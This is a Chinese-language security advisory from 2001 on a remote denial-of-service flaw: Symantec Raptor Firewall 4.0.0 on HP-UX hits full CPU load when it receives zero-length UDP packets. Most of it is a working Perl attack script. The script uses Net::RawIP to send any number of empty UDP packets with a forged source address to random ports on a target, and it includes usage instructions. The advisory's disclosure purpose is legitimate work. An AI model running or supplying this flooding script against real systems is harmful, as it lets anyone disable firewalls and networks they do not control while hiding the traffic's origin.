Raptor Firewall 对于零长度的UDP数据包可导致拒绝服务攻击发布时间:2001-11-08 更新时间:2001-11-08 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 受影响系统 Symantec Raptor Firewall 4.0.0 HP-UX详细描述 Raptor 防火墙是由Symantec开发的一款商业防火墙。 其中防火墙对UPD数据包处理存在问题,当防火墙接收到零字节长度的UDP包,就会消耗系统CPU的100%利用率。 导致远程用户可以对防火墙和系统产生拒绝服务攻击。 测试代码 #!/usr/bin/perl ################################### # This Code is for education only # ################################### # Greetings to kitchen from #perl on irc openproject.net # For the help on some perl questions. # Firewalls are hard on the outside and crunchy on the inside # # The Rapor Firewall UDP-GSP (UDP-Proxy) gets 100% CPU load # When getting UDP-Packets with no Data init # # Written 21.Jun 2001 by Max Moser mmo@remote-exploit.org # # http://www.remote-exploit.org # use Net::RawIP; use Getopt::Long; GetOptions('src=s','dst=s','num=i'); if (!$opt_src | !$opt_dst | !$opt_num ){ print "\nUsage parameters for ".$0.":\n"; print "\t--src\t IP-Sourceaddress\n"; print "\t--dst\t IP-Destinationaddress\n"; print "\t--num\t Numer of UDP packets to send\n"; print "\nExample:\n"; print "\t".$0." --src=192.168.0.1 --dst=192.168.0.354 --num=1000\n\n\n"; exit(1); }; # Some defines $| = 1; @anim= ("\\","|","/","-","\\","|","/","-"); $source=$opt_src; $destination=$opt_dst; $numpack=$opt_num; print "\n\n\tSending packets now "; for($x=0;$x<$numpack;$x=$x+1){ my $sport=(rand(65534)+1); my $dport=(rand(1024)+1); my $c=new Net::RawIP({udp=>{source=>$sport,dest=>$dport}}); $c->set({ip=>{saddr=>$source,daddr=>$destination},{udp}}); $c->send; undef $c; for ($y=0;$y<8;$y=$y+1){ print "\b" . $anim[$y]; select (undef,undef,undef,0.01); if ($y==8){ $y=0}; }; }; print "\n\n\nSuccessfully sent ".$numpack." packets to ". $destination . "\n\n"; 解决方案 其中Symantec Enterprise Firewall 6.5.X版本不受此漏洞影响。 相关信息 Max Moser <mmo@phase1.ch> |
